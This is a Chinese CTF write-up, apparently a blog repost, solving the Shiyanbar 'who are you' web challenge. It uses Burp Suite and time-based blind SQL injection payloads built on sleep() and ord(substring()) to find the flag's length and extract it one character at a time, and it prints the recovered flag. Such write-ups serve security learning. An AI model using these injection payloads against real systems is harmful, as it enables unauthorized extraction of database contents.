zoukankan      html  css  js  c++  java
  • 实验吧-who are you burpsuite爆破

    链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php

    1.首先先设定burpsuite的timeout为4秒

    2.构造语句判断flag的长度

    1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1


    点击go之后raw中没有显示,等待五秒后alerts选项卡中出现了timeout的提示,说明flag的长度就是32

    3.把数据包发送到intruder中进行爆破



    这里需要把 attack type 改成 cluster bomb

    构造语句为
    1' and (select case when (select ord(substring(flag from 1 for 1)) from flag limit 1) = 2 then sleep(5) else 1 end) and '1'='1

    接下来设置payload

      之后还要注意把线程设置为1,以及去掉URL-encode勾选

    接下来就是开始爆破

    这里面status 为空白的,就是请求超时的

    payload1对应的flag的顺序,payload2对应的是flag中的ASCII码,自己一个一个对照就可以得到flag

    cdbf14c9551d5be5612f7bb5d2867853

    题目还要加上ctf{}

  • 相关阅读:
    Fiddler基础与HTTP状态码
    Fiddler与F12设置代理
    人和机器猜拳游戏
    ng-model 取不到值
    git的使用
    笔记
    INSPIRED启示录 读书笔记
    INSPIRED启示录 读书笔记
    INSPIRED启示录 读书笔记
    INSPIRED启示录 读书笔记
  • 原文地址:https://www.cnblogs.com/baifan2618/p/7868343.html
Copyright © 2011-2022 走看看